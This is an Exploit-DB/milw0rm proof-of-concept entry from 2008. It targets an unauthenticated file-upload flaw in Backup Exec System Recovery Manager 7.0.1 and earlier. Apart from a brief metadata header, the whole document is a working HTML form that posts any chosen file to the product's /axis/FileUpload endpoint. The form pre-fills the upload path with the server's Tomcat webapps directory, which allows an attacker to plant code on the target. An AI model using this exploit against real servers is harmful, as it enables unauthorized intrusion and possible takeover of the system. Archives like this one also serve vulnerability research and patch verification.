Backup Exec System Recovery Manager <= 7.0.1 File Upload Exploit

2008-02-07T00:00:00
ID EDB-ID:5078
Type exploitdb
Reporter titon
Modified 2008-02-07T00:00:00

Description

Backup Exec System Recovery Manager <= 7.0.1 File Upload Exploit. Remote exploit for windows platform

                                        
                                            &lt;?xml version="1.0"?&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
  &lt;head&gt;&lt;title&gt;File Upload POC&lt;/title&gt;&lt;/head&gt;
  &lt;body&gt;
    &lt;h2&gt; Backup Exec System Recovery Manager 7.0&lt;br&gt;File Upload POC&lt;/h2&gt;
    &lt;form action="https://&lt;TARGET&gt;:8443/axis/FileUpload" method="post"
enctype="multipart/form-data"&gt;
      Remote Path: &lt;input name="path" size="100" type="text"
value="C:\Program Files\Symantec\Backup Exec System
Recovery\Manager\Services\tomcat\WebApps\axis"/&gt;&lt;br/&gt;
	File to upload: &lt;input name="log_file" type="file"/&gt;&lt;br/&gt;
      &lt;hr/&gt;
      &lt;p&gt;&lt;input type="submit"/&gt;&lt;input type="reset"/&gt;&lt;/p&gt;
	  &lt;/form&gt;
(c)BastardLabs 2008.
  &lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2008-02-07]